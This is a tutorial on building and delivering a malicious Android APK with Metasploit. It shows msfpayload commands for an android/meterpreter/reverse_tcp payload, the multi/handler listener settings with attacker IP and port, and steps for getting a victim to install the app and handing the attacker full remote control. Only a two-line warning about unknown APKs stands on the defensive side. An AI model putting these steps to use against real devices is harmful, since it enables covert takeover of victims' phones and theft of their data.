Hack Android Smartphone using Metasploit

Nowadays, Mobile users are increasing day by day, the Security threat is also increasing together with the growth of its users. Our Tutorial for Today is How to Hack Android Smartphone using Metasploit. Why we choose Android Phone for this Tutorial? Simply Because Android Phone growing very fast worldwide and is Cheap.

What is Android?

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for Mobile Devices.

What is APK?

Android application Package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.

Here is some Information for this Tutorial:

• Attacker IP address: 192.168.8.94
• Attacker Port to Receive connection: 443

Requirements:

• Metasploit framework (I used Kali Linux 1.0.6 in this Tutorial)
• Android Smartphone (I used HTC One android 4.4 KitKat)

Steps for Hacking Android Smartphone using Metasploit:

1. Open Terminal (CTRL + ALT + T).
2. We will utilize Metasploit Payload Framework to create exploit for this Tutorial.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>

As described above that attacker IP address is 192.168.8.94.

3. Because our Payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Information:

Use exploit/multi/handler > We will use Metasploit Handler set payload android/meterpreter/reverse_tcp > Make sure the Payload is the same with Step 2.

4. The Next Step we need to configure the switch for the Metasploit Payload we already specified in Step 3.

Information:

set lhost 192.168.8.94 > attacker IP address set lport 443 > port to listen the reverse connection exploit > start to listen incoming connection.

5. Attacker already have the APK's file and now He will start Distributing it.

6. The Victim Download the Malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

7. It mean that attacker already inside the Victim Android Smartphone and he can do everything with victim's Phone.

Conclusion:

1. Don't install APK's from the unknown source.

2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this Tutorial: